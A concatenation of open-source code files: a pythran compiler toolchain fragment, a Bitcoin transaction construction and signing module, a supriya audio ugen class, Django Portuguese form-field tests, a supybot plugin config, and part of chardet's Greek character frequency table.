code = '''
#define BOOST_PYTHON_MAX_ARITY 4
#include <pythonic/core.hpp>
'''
output_file = compile_cxxcode('test', code)
output_file and os.remove(output_file)
| bsd-3-clause |
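A brief usage sketch for the toolchain above, driving compile_pythrancode() directly and letting spec_parser pick the export out of a '#pythran export' comment; the module name and kernel are invented for illustration.
from pythran.toolchain import compile_pythrancode

source = """
#pythran export dot(float list, float list)
def dot(a, b):
    return sum(x * y for x, y in zip(a, b))
"""

# Builds my_dot.so in the current working directory unless output_file is
# given; pass cpponly=True to stop at the generated C++ stage instead.
so_path = compile_pythrancode("my_dot", source)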
ValyrianTech/BitcoinSpellbook-v0.3 | transactionfactory.py | 1 | 21726 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import hmac
import copy
from helpers.py2specials import *
from helpers.py3specials import *
from helpers.privatekeyhelpers import privkey_to_pubkey, decode_privkey, get_privkey_format, encode_privkey
from helpers.publickeyhelpers import pubkey_to_address
from helpers.jacobianhelpers import fast_multiply, inv, G, N
from helpers.bech32 import bech32_decode
from helpers.bech32 import decode as decode_witness_program
from helpers.loghelpers import LOG
SIGHASH_ALL = 1
SIGHASH_NONE = 2
SIGHASH_SINGLE = 3
# this works like SIGHASH_ANYONECANPAY | SIGHASH_ALL, might as well make it explicit while
# we fix the constant
SIGHASH_ANYONECANPAY = 0x81
is_python2 = sys.version_info.major == 2
def make_custom_tx(private_keys, tx_inputs, tx_outputs, tx_fee=0, op_return_data=None, allow_zero_conf=False):
"""
Construct a custom transaction
:param private_keys: a dict containing a key for each required address with the corresponding private key
:param tx_inputs: a list of dicts containing the following keys: 'address', 'value', 'output' and 'confirmations'
output should be formatted as 'txid:i'
:param tx_outputs: a list of dicts containing the keys 'address' and 'value'
:param tx_fee: The total transaction fee in satoshis (The fee must be equal to the difference of the inputs and the outputs, this is an extra safety precaution)
:param op_return_data: an optional message to add as an OP_RETURN output (max 80 chars)
:param allow_zero_conf: Allow zero confirmation inputs (default=False)
:return: A raw transaction
"""
# Check if the transaction fee is valid
if not isinstance(tx_fee, int) or tx_fee < 0:
LOG.error('Invalid transaction fee: %d satoshis' % tx_fee)
LOG.error('type: %s' % type(tx_fee))
return
# Check if the supplied fee is equal to the difference between the total input value and total output value
total_input_value = sum([tx_input['value'] for tx_input in tx_inputs])
total_output_value = sum([tx_output['value'] for tx_output in tx_outputs])
if tx_fee != total_input_value - total_output_value:
LOG.error('Transaction fee does not match the difference between the total input value and the total output value!')
LOG.error('Total input: %s, Total output: %s, Transaction fee: %s' % (total_input_value, total_output_value, tx_fee))
return
# Check if all required private keys have been supplied
all_keys_present = all([tx_input['address'] in private_keys for tx_input in tx_inputs])
if not all_keys_present:
LOG.error("At least 1 private key is missing.")
return
if allow_zero_conf is False:
# Check if all inputs have at least 1 confirmation
all_inputs_confirmed = all([tx_input['confirmations'] > 0 for tx_input in tx_inputs])
if not all_inputs_confirmed:
LOG.error("At least 1 input is unconfirmed.")
return
# Check if an OP_RETURN message needs to be added and if it is valid
if isinstance(op_return_data, string_types) and len(op_return_data) > 80:
LOG.error('OP_RETURN data is longer than 80 characters')
return
# All is good, make the transaction
tx = mktx(tx_inputs, tx_outputs)
# Add OP_RETURN message if necessary
if isinstance(op_return_data, string_types):
tx = add_op_return(op_return_data, tx)
# Now sign each transaction input with the private key
for i in range(0, len(tx_inputs)):
tx = sign(tx, i, str(private_keys[tx_inputs[i]['address']]))
return tx
# def send_tx(tx):
# success = False
# response = {}
# try:
# # retval = pybitcointools.blockr_pushtx(tx)
# retval = {'status': 'success'}
# logging.info("TX broadcast succeeded, Blockr response: %s" % str(retval))
# response = json.loads(retval)
# except Exception as e:
# logging.error("TX broadcast failed: %s" % str(e))
#
# if 'status' in response and response['status'] == 'success':
# success = True
#
# return success
# extra functions for op_return from a fork of pybitcointools
# https://github.com/wizardofozzie/pybitcointools
def num_to_op_push(x):
x = int(x)
if 0 <= x <= 75:
pc = b''
num = encode(x, 256, 1)
elif x < 0xff:
pc = from_int_to_byte(0x4c)
num = encode(x, 256, 1)
elif x < 0xffff:
pc = from_int_to_byte(0x4d)
num = encode(x, 256, 2)[::-1]
elif x < 0xffffffff:
pc = from_int_to_byte(0x4e)
num = encode(x, 256, 4)[::-1]
else:
raise ValueError("0xffffffff > value >= 0")
return pc + num
def op_return_script(hex_data):
"""
Construct the OP_RETURN script for given data
:param hex_data: The data to add as OP_RETURN in hexadecimal format
:return: The OP_RETURN script
"""
if not isinstance(hex_data, str):
raise Exception('Data to add as OP_RETURN must be a string containing a hexadecimal number')
if re.match('^[0-9a-fA-F]*$', hex_data) is None or len(hex_data) % 2 != 0:
raise Exception('Data to add as OP_RETURN must be in hex format')
return '6a' + safe_hexlify(num_to_op_push(len(hex_data)/2)) + hex_data
def add_op_return(msg, tx_hex=None):
"""Makes OP_RETURN script from msg, embeds in Tx hex"""
hex_data = op_return_script(hex_data=safe_hexlify(msg.encode()))
if tx_hex is None:
return hex_data
else:
if not re.match("^[0-9a-fA-F]*$", tx_hex):
return binascii.unhexlify(add_op_return(msg, binascii.hexlify(tx_hex)))
elif isinstance(tx_hex, dict):
txo = tx_hex
outs = txo.get('outs')
else:
outs = deserialize(tx_hex).get('outs')
txo = deserialize(tx_hex)
assert (len(outs) > 0) and sum(multiaccess(outs, 'value')) > 0 \
and not any([o for o in outs if o.get("script")[:2] == '6a']), \
"Tx limited to *1* OP_RETURN, and only whilst the other outputs send funds"
txo['outs'].append({'script': hex_data, 'value': 0})
return serialize(txo)
# copied from pybitcointools
def serialize(txobj):
# if isinstance(txobj, bytes):
# txobj = bytes_to_hex_string(txobj)
o = []
if json_is_base(txobj, 16):
json_changedbase = json_changebase(txobj, lambda x: binascii.unhexlify(x))
hexlified = safe_hexlify(serialize(json_changedbase))
return hexlified
o.append(encode(txobj["version"], 256, 4)[::-1])
o.append(num_to_var_int(len(txobj["ins"])))
for inp in txobj["ins"]:
o.append(inp["outpoint"]["hash"][::-1])
o.append(encode(inp["outpoint"]["index"], 256, 4)[::-1])
o.append(num_to_var_int(len(inp["script"]))+(inp["script"] if inp["script"] or is_python2 else bytes()))
o.append(encode(inp["sequence"], 256, 4)[::-1])
o.append(num_to_var_int(len(txobj["outs"])))
for out in txobj["outs"]:
o.append(encode(out["value"], 256, 8)[::-1])
o.append(num_to_var_int(len(out["script"]))+out["script"])
o.append(encode(txobj["locktime"], 256, 4)[::-1])
return ''.join(o) if is_python2 else reduce(lambda x,y: x+y, o, bytes())
def deserialize(tx):
if isinstance(tx, str) and re.match('^[0-9a-fA-F]*$', tx):
# tx = bytes(bytearray.fromhex(tx))
return json_changebase(deserialize(binascii.unhexlify(tx)),
lambda x: safe_hexlify(x))
# http://stackoverflow.com/questions/4851463/python-closure-write-to-variable-in-parent-scope
# Python's scoping rules are demented, requiring me to make pos an object
# so that it is call-by-reference
pos = [0]
def read_as_int(bytez):
pos[0] += bytez
return decode(tx[pos[0] - bytez:pos[0]][::-1], 256)
def read_var_int():
pos[0] += 1
val = from_byte_to_int(tx[pos[0] - 1])
if val < 253:
return val
return read_as_int(pow(2, val - 252))
def read_bytes(bytez):
pos[0] += bytez
return tx[pos[0] - bytez:pos[0]]
def read_var_string():
size = read_var_int()
return read_bytes(size)
obj = {"ins": [], "outs": [], "version": read_as_int(4)}
ins = read_var_int()
for i in range(ins):
obj["ins"].append({
"outpoint": {
"hash": read_bytes(32)[::-1],
"index": read_as_int(4)
},
"script": read_var_string(),
"sequence": read_as_int(4)
})
outs = read_var_int()
for i in range(outs):
obj["outs"].append({
"value": read_as_int(8),
"script": read_var_string()
})
obj["locktime"] = read_as_int(4)
return obj
def access(obj, prop):
if isinstance(obj, dict):
if prop in obj:
return obj[prop]
elif '.' in prop:
return obj[float(prop)]
else:
return obj[int(prop)]
else:
return obj[int(prop)]
def multiaccess(obj, prop):
return [access(o, prop) for o in obj]
def mktx(*args):
# [in0, in1...],[out0, out1...] or in0, in1 ... out0 out1 ...
ins, outs = [], []
for arg in args:
if isinstance(arg, list):
for a in arg: (ins if is_inp(a) else outs).append(a)
else:
(ins if is_inp(arg) else outs).append(arg)
txobj = {"locktime": 0, "version": 1, "ins": [], "outs": []}
for i in ins:
if isinstance(i, dict) and "outpoint" in i:
txobj["ins"].append(i)
else:
if isinstance(i, dict) and "output" in i:
i = i["output"]
txobj["ins"].append({
"outpoint": {"hash": i[:64], "index": int(i[65:])},
"script": "",
"sequence": 4294967295
})
for o in outs:
if isinstance(o, string_or_bytes_types):
addr = o[:o.find(':')]
val = int(o[o.find(':')+1:])
o = {}
if re.match('^[0-9a-fA-F]*$', addr):
o["script"] = addr
else:
o["address"] = addr
o["value"] = val
outobj = {}
if "address" in o:
outobj["script"] = address_to_script(o["address"])
elif "script" in o:
outobj["script"] = o["script"]
else:
raise Exception("Could not find 'address' or 'script' in output.")
outobj["value"] = o["value"]
txobj["outs"].append(outobj)
return serialize(txobj)
def sign(tx, i, priv, hashcode=SIGHASH_ALL):
i = int(i)
if (not is_python2 and isinstance(re, bytes)) or not re.match('^[0-9a-fA-F]*$', tx):
return binascii.unhexlify(sign(safe_hexlify(tx), i, priv))
if len(priv) <= 33:
priv = safe_hexlify(priv)
pub = privkey_to_pubkey(priv)
address = pubkey_to_address(pub)
signing_tx = signature_form(tx, i, p2pkh_script(address), hashcode)
sig = ecdsa_tx_sign(signing_tx, priv, hashcode)
txobj = deserialize(tx)
txobj["ins"][i]["script"] = serialize_script([sig, pub])
return serialize(txobj)
def is_inp(arg):
return len(arg) > 64 or "output" in arg or "outpoint" in arg
def json_is_base(obj, base):
if not is_python2 and isinstance(obj, bytes):
return False
alpha = get_code_string(base)
if isinstance(obj, string_types):
for i in range(len(obj)):
if alpha.find(obj[i]) == -1:
return False
return True
elif isinstance(obj, int_types) or obj is None:
return True
elif isinstance(obj, list):
for i in range(len(obj)):
if not json_is_base(obj[i], base):
return False
return True
else:
for x in obj:
if not json_is_base(obj[x], base):
return False
return True
def json_changebase(obj, changer):
if isinstance(obj, string_or_bytes_types):
return changer(obj)
elif isinstance(obj, int_types) or obj is None:
return obj
elif isinstance(obj, list):
return [json_changebase(x, changer) for x in obj]
return dict((x, json_changebase(obj[x], changer)) for x in obj)
def num_to_var_int(x):
x = int(x)
if x < 253:
return from_int_to_byte(x)
elif x < 65536:
return from_int_to_byte(253)+encode(x, 256, 2)[::-1]
elif x < 4294967296:
return from_int_to_byte(254) + encode(x, 256, 4)[::-1]
else:
return from_int_to_byte(255) + encode(x, 256, 8)[::-1]
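# Reference sketch (not from the upstream library): thresholds used by
# num_to_var_int() above (Bitcoin "CompactSize" integers):
#   x < 253      -> 1 raw byte
#   x < 2**16    -> 0xfd + 2-byte little-endian value
#   x < 2**32    -> 0xfe + 4-byte little-endian value
#   otherwise    -> 0xff + 8-byte little-endian value
# e.g. num_to_var_int(300) yields b'\xfd\x2c\x01' (300 == 0x012c, little-endian).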
def b58check_to_hex(address):
"""
    Decode a base58check string and return its payload in hexadecimal format
    :param address: A Bitcoin address
    :return: the decoded payload (version byte and checksum stripped), hex-encoded
"""
return safe_hexlify(b58check_to_bin(address))
def b58check_to_bin(address):
"""
    Verify the base58check checksum, then return the payload with the version byte (first byte) and the checksum (last 4 bytes) stripped
    :param address: A Bitcoin address
    :return: the decoded payload in binary format
"""
leadingzbytes = len(re.match('^1*', address).group(0)) # number of leading zero bytes (1 == 0 in base58)
data = b'\x00' * leadingzbytes + changebase(address, 58, 256)
assert bin_dbl_sha256(data[:-4])[:4] == data[-4:]
return data[1:-4]
def p2sh_script(address):
"""
Make a Pay-To-Script-Hash (P2SH) script
This is the type of scripts used by multisig addresses -> starting with 3 (mainnet) or 2 (testnet)
OP_HASH160 <redeemScriptHash> OP_EQUAL
a9 14 89 AB CD EF AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA 87
OP_HASH160 Bytes to push Data to push OP_EQUAL
14 hex = 20 bytes
:param address: A Bitcoin address
:return: a P2SH script
"""
return 'a914' + b58check_to_hex(address) + '87'
def p2pkh_script(address):
"""
Make a Pay-To-Public-Key-Hash (P2PKH) script
This is the type of script old legacy addresses use -> starting with 1 (mainnet) or m or n (testnet)
OP_DUP OP_HASH160 <pubKeyHash> OP_EQUALVERIFY OP_CHECKSIG
76 a9 14 89 AB CD EF AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA 88 ac
OP_DUP OP_HASH160 Bytes to push Data to push OP_EQUALVERIFY OP_CHECKSIG
14 hex = 20 bytes
:param address: A Bitcoin address
:return: a P2PKH script
"""
return '76a914' + b58check_to_hex(address) + '88ac'
def p2wpkh_script(address):
"""
Make a Pay-To-Witness-Public-Key-Hash (P2WPKH) script
This is the type of script used by the new bech32 addresses -> starting with bc1 (mainnet) or tb1 (testnet)
0 <pubKeyHash>
00 14 89 AB CD EF AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA
0 Bytes to push Data to push
14 hex = 20 bytes
:param address: A Bitcoin address
:return: a P2WPKH script
"""
hrp, data = bech32_decode(address)
version, decoded = decode_witness_program(hrp=hrp, addr=address)
if is_python2:
pubkeyhash = ''.join([chr(a) for a in decoded])
else:
pubkeyhash = bytes(decoded)
return '0014' + safe_hexlify(pubkeyhash)
def p2wsh_script(address):
"""
Make a Pay-To-Witness-Script-Hash (P2WSH) script
This is the type of script used by the new bech32 addresses (multisig) -> starting with bc1 (mainnet) or tb1 (testnet)
0 <script hash>
00 20 89 AB CD EF AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA
0 Bytes to push Data to push
20 hex = 32 bytes
:param address: A Bitcoin address
    :return: a P2WSH script
"""
hrp, data = bech32_decode(address)
version, decoded = decode_witness_program(hrp=hrp, addr=address)
if is_python2:
scripthash = ''.join([chr(a) for a in decoded])
else:
scripthash = bytes(decoded)
return '0020' + safe_hexlify(scripthash)
def address_to_script(address):
"""
Make the script based on the address
:param address: a Bitcoin address
    :return: a P2SH, P2PKH, P2WPKH or P2WSH script, depending on the address format
"""
if address[0] == '3' or address[0] == '2':
return p2sh_script(address=address)
elif address[:3] == 'bc1' or address[:3] == 'tb1':
if len(address) == 42:
return p2wpkh_script(address=address)
elif len(address) == 62:
return p2wsh_script(address=address)
else:
raise Exception('Invalid version 0 bech32 address (length must be 42 or 62): %s' % address)
else:
return p2pkh_script(address=address)
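# Reference sketch (not from the upstream library): summary of the dispatch
# address_to_script() performs above:
#   base58 starting with '3' or '2'      -> p2sh_script()   ('a914' + hash160 + '87')
#   bech32 'bc1...'/'tb1...', length 42  -> p2wpkh_script() ('0014' + 20-byte program)
#   bech32 'bc1...'/'tb1...', length 62  -> p2wsh_script()  ('0020' + 32-byte program)
#   any other base58 address             -> p2pkh_script()  ('76a914' + hash160 + '88ac')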
def signature_form(tx, i, script, hashcode=SIGHASH_ALL):
i, hashcode = int(i), int(hashcode)
if isinstance(tx, string_or_bytes_types):
return serialize(signature_form(deserialize(tx), i, script, hashcode))
newtx = copy.deepcopy(tx)
for inp in newtx["ins"]:
inp["script"] = ""
newtx["ins"][i]["script"] = script
if hashcode == SIGHASH_NONE:
newtx["outs"] = []
elif hashcode == SIGHASH_SINGLE:
newtx["outs"] = newtx["outs"][:len(newtx["ins"])]
for out in newtx["outs"][:len(newtx["ins"]) - 1]:
out['value'] = 2**64 - 1
out['script'] = ""
elif hashcode == SIGHASH_ANYONECANPAY:
newtx["ins"] = [newtx["ins"][i]]
else:
pass
return newtx
if is_python2:
def serialize_script(script):
if json_is_base(script, 16):
return binascii.hexlify(serialize_script(json_changebase(script,
lambda x: binascii.unhexlify(x))))
return ''.join(map(serialize_script_unit, script))
else:
def serialize_script(script):
if json_is_base(script, 16):
return safe_hexlify(serialize_script(json_changebase(script,
lambda x: binascii.unhexlify(x))))
result = bytes()
for b in map(serialize_script_unit, script):
result += b if isinstance(b, bytes) else bytes(b, 'utf-8')
return result
def serialize_script_unit(unit):
if isinstance(unit, int):
if unit < 16:
return from_int_to_byte(unit + 80)
else:
return from_int_to_byte(unit)
elif unit is None:
return b'\x00'
else:
if len(unit) <= 75:
return from_int_to_byte(len(unit))+unit
elif len(unit) < 256:
return from_int_to_byte(76)+from_int_to_byte(len(unit))+unit
elif len(unit) < 65536:
return from_int_to_byte(77)+encode(len(unit), 256, 2)[::-1]+unit
else:
return from_int_to_byte(78)+encode(len(unit), 256, 4)[::-1]+unit
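# Reference sketch (not from the upstream library): push-size rules implemented
# by serialize_script_unit() above:
#   len(unit) <= 75     -> one length byte, then the data
#   len(unit) <  256    -> 0x4c (OP_PUSHDATA1) + 1-byte length + data
#   len(unit) <  65536  -> 0x4d (OP_PUSHDATA2) + 2-byte little-endian length + data
#   otherwise           -> 0x4e (OP_PUSHDATA4) + 4-byte little-endian length + data
# Integers 1..15 become OP_1..OP_15 (value + 80 -> 0x51..0x5f); None becomes OP_0.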
def der_encode_sig(v, r, s):
b1, b2 = safe_hexlify(encode(r, 256)), safe_hexlify(encode(s, 256))
if len(b1) and b1[0] in '89abcdef':
b1 = '00' + b1
if len(b2) and b2[0] in '89abcdef':
b2 = '00' + b2
left = '02'+encode(len(b1)//2, 16, 2)+b1
right = '02'+encode(len(b2)//2, 16, 2)+b2
return '30'+encode(len(left+right)//2, 16, 2)+left+right
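# Reference sketch (not from the upstream library): layout produced by
# der_encode_sig() above, in hex:
#   30 <total-length> 02 <len(r)> <r> 02 <len(s)> <s>
# A leading 00 byte is prepended to r or s whenever its high bit is set, so the
# value is not misread as a negative integer; ecdsa_tx_sign() appends the
# hashcode byte afterwards.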
def ecdsa_tx_sign(tx, priv, hashcode=SIGHASH_ALL):
rawsig = ecdsa_raw_sign(bin_txhash(tx, hashcode), priv)
return der_encode_sig(*rawsig)+encode(hashcode, 16, 2)
def ecdsa_raw_sign(msghash, priv):
z = hash_to_int(msghash)
k = deterministic_generate_k(msghash, priv)
r, y = fast_multiply(G, k)
s = inv(k, N) * (z + r*decode_privkey(priv)) % N
v, r, s = 27+((y % 2) ^ (0 if s * 2 < N else 1)), r, s if s * 2 < N else N - s
if 'compressed' in get_privkey_format(priv):
v += 4
return v, r, s
def hash_to_int(string):
"""
Convert a hash string to an integer
:param string: a hash string
:return: an integer
"""
if len(string) in [40, 64]:
return decode(string, 16)
return decode(string, 256)
def deterministic_generate_k(msghash, priv):
v = b'\x01' * 32
k = b'\x00' * 32
priv = encode_privkey(priv, 'bin')
msghash = encode(hash_to_int(msghash), 256, 32)
k = hmac.new(k, v+b'\x00'+priv+msghash, hashlib.sha256).digest()
v = hmac.new(k, v, hashlib.sha256).digest()
k = hmac.new(k, v+b'\x01'+priv+msghash, hashlib.sha256).digest()
v = hmac.new(k, v, hashlib.sha256).digest()
return decode(hmac.new(k, v, hashlib.sha256).digest(), 256)
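# Hedged note (not from the upstream library): the nonce derivation above
# follows the HMAC-SHA256 construction of RFC 6979 (deterministic ECDSA): seed
# K and V from the private key and message hash, then take the first generated
# block as k. It omits the retry loop the RFC specifies for the rare case where
# k is 0 or not below the curve order.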
def bin_txhash(tx, hashcode=None):
"""
Get the transaction hash (txid) in binary format
:param tx: The transaction
:param hashcode: SIGHASH_ALL = 1, SIGHASH_NONE = 2, SIGHASH_SINGLE = 3, SIGHASH_ANYONECANPAY = 0x81
:return: a transaction hash (txid) in binary format
"""
return binascii.unhexlify(txhash(tx, hashcode))
def txhash(tx, hashcode=None):
"""
Get the transaction hash (txid)
:param tx: The transaction
:param hashcode: SIGHASH_ALL = 1, SIGHASH_NONE = 2, SIGHASH_SINGLE = 3, SIGHASH_ANYONECANPAY = 0x81
:return: a transaction hash (txid) in hexadecimal format
"""
if isinstance(tx, str) and re.match('^[0-9a-fA-F]*$', tx):
tx = changebase(tx, 16, 256)
    # [::-1] reverses the byte order (hashes are displayed with their bytes reversed)
if hashcode:
return double_sha256(from_string_to_bytes(tx) + encode(int(hashcode), 256, 4)[::-1])
else:
return safe_hexlify(bin_dbl_sha256(tx)[::-1])
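# Hedged note (not from the upstream library): with no hashcode, txhash()
# returns the display txid: double SHA-256 of the serialized transaction with
# the byte order reversed. With a hashcode it returns the signature hash
# instead: double SHA-256 of the serialization plus the 4-byte little-endian
# hashcode, without the byte reversal.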
def double_sha256(string):
"""
Do a double SHA256 hash on a string
:param string: A string
:return: The hash in hexadecimal format
"""
return safe_hexlify(bin_dbl_sha256(string))
| gpl-3.0 |
josiah-wolf-oberholtzer/supriya | etc/pending_ugens/VarLag.py | 2 | 6303 | import collections
from supriya.enums import CalculationRate
from supriya.ugens.Filter import Filter
class VarLag(Filter):
"""
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag
VarLag.ar()
"""
### CLASS VARIABLES ###
__documentation_section__ = None
__slots__ = ()
    # a plain tuple so that the .index() lookups in the property getters work
    _ordered_input_names = (
        'source',
        'time',
        'curvature',
        'warp',
        'start',
        )
_valid_calculation_rates = None
### INITIALIZER ###
def __init__(
self,
calculation_rate=None,
curvature=0,
source=None,
start=None,
time=0.1,
warp=5,
):
Filter.__init__(
self,
calculation_rate=calculation_rate,
curvature=curvature,
source=source,
start=start,
time=time,
warp=warp,
)
### PUBLIC METHODS ###
@classmethod
def ar(
cls,
curvature=0,
source=None,
start=None,
time=0.1,
warp=5,
):
"""
Constructs an audio-rate VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag
VarLag.ar()
Returns ugen graph.
"""
import supriya.synthdefs
calculation_rate = supriya.CalculationRate.AUDIO
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
curvature=curvature,
source=source,
start=start,
time=time,
warp=warp,
)
return ugen
# def coeffs(): ...
@classmethod
def kr(
cls,
curvature=0,
source=None,
start=None,
time=0.1,
warp=5,
):
"""
Constructs a control-rate VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.kr(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag
VarLag.kr()
Returns ugen graph.
"""
import supriya.synthdefs
calculation_rate = supriya.CalculationRate.CONTROL
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
curvature=curvature,
source=source,
start=start,
time=time,
warp=warp,
)
return ugen
# def magResponse(): ...
# def magResponse2(): ...
# def magResponse5(): ...
# def magResponseN(): ...
# def new1(): ...
# def scopeResponse(): ...
### PUBLIC PROPERTIES ###
@property
def curvature(self):
"""
Gets `curvature` input of VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag.curvature
0.0
Returns ugen input.
"""
index = self._ordered_input_names.index('curvature')
return self._inputs[index]
@property
def source(self):
"""
Gets `source` input of VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag.source
OutputProxy(
source=In(
bus=0.0,
calculation_rate=CalculationRate.AUDIO,
channel_count=1
),
output_index=0
)
Returns ugen input.
"""
index = self._ordered_input_names.index('source')
return self._inputs[index]
@property
def start(self):
"""
Gets `start` input of VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag.start
Returns ugen input.
"""
index = self._ordered_input_names.index('start')
return self._inputs[index]
@property
def time(self):
"""
Gets `time` input of VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag.time
0.1
Returns ugen input.
"""
index = self._ordered_input_names.index('time')
return self._inputs[index]
@property
def warp(self):
"""
Gets `warp` input of VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag.warp
5.0
Returns ugen input.
"""
index = self._ordered_input_names.index('warp')
return self._inputs[index]
| mit |
ridfrustum/lettuce | tests/integration/lib/Django-1.3/tests/regressiontests/forms/localflavor/pt.py | 50 | 1063 | from django.contrib.localflavor.pt.forms import PTZipCodeField, PTPhoneNumberField
from utils import LocalFlavorTestCase
class PTLocalFlavorTests(LocalFlavorTestCase):
def test_PTZipCodeField(self):
error_format = [u'Enter a zip code in the format XXXX-XXX.']
valid = {
'3030-034': '3030-034',
'1003456': '1003-456',
}
invalid = {
'2A200': error_format,
'980001': error_format,
}
self.assertFieldOutput(PTZipCodeField, valid, invalid)
def test_PTPhoneNumberField(self):
error_format = [u'Phone numbers must have 9 digits, or start by + or 00']
valid = {
'917845189': '917845189',
'91 784 5189': '917845189',
'91 784 5189': '917845189',
'+351 91 111': '+35191111',
'00351873': '00351873',
}
invalid = {
'91 784 51 8': error_format,
'091 456 987 1': error_format,
}
self.assertFieldOutput(PTPhoneNumberField, valid, invalid)
| gpl-3.0 |
jeffmahoney/supybot | plugins/Quote/config.py | 15 | 2352 | ###
# Copyright (c) 2005, Daniel DiPaolo
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.conf as conf
import supybot.registry as registry
def configure(advanced):
# This will be called by supybot to configure this module. advanced is
# a bool that specifies whether the user identified himself as an advanced
# user or not. You should effect your configuration by manipulating the
# registry as appropriate.
from supybot.questions import expect, anything, something, yn
conf.registerPlugin('Quote', True)
Quote = conf.registerPlugin('Quote')
# This is where your configuration variables (if any) should go. For example:
# conf.registerGlobalValue(Quote, 'someConfigVariableName',
# registry.Boolean(False, """Help for someConfigVariableName."""))
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| bsd-3-clause |
musicrighter/CIS422-P2 | env/lib/python3.4/site-packages/pip/_vendor/requests/packages/chardet/langgreekmodel.py | 2763 | 12628 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# 255: Control characters that usually do not exist in any text
# 254: Carriage/Return
# 253: symbols (punctuation) that do not belong to words
# 252: 0 - 9
# Character Mapping Table:
Latin7_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 82,100,104, 94, 98,101,116,102,111,187,117, 92, 88,113, 85, # 40
79,118,105, 83, 67,114,119, 95, 99,109,188,253,253,253,253,253, # 50
253, 72, 70, 80, 81, 60, 96, 93, 89, 68,120, 97, 77, 86, 69, 55, # 60
78,115, 65, 66, 58, 76,106,103, 87,107,112,253,253,253,253,253, # 70
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 80
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 90
253,233, 90,253,253,253,253,253,253,253,253,253,253, 74,253,253, # a0
253,253,253,253,247,248, 61, 36, 46, 71, 73,253, 54,253,108,123, # b0
110, 31, 51, 43, 41, 34, 91, 40, 52, 47, 44, 53, 38, 49, 59, 39, # c0
